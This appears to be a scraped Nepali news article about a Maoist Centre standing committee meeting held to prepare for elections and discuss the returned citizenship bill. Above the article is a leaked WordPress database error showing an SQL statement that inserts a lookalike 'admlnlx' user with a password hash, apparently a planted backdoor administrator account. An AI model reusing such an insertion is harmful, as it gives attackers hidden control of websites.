WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BF7L2B02pajhLbYkXZGV5ao8/dteqg1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-09 15:29:42', '', 'admlnlx', 'admlnlx')
काठमाण्डौ । आज नेकपा माओवादी केन्द्रको स्थायी समिति बैठक बस्दैछ । आगामी ४ मंसिरमा हुने संघीय र प्रदेशसभा निर्वाचनको तयारीका बारेमा छलफलका लागि माओवादीले स्थायी समिति बैठक बोलाएको हो ।
‘आज १ बजे बैठक बस्नेछ, यो नियमित बैठक रहेको प्रचण्डका स्वकिय सचिव रमेश मल्लले बताए ।
राष्ट्रपति विद्यादेवी भण्डारीले नागरिकता विद्येयक संघीय संसदमा नै थप छलफलका लागि फिर्ता पठाएको भोलिपल्ट माओवादीले स्थायी समिति बैठक बोलाएकाले सो बारेमा पनि छलफल हुनेछ ।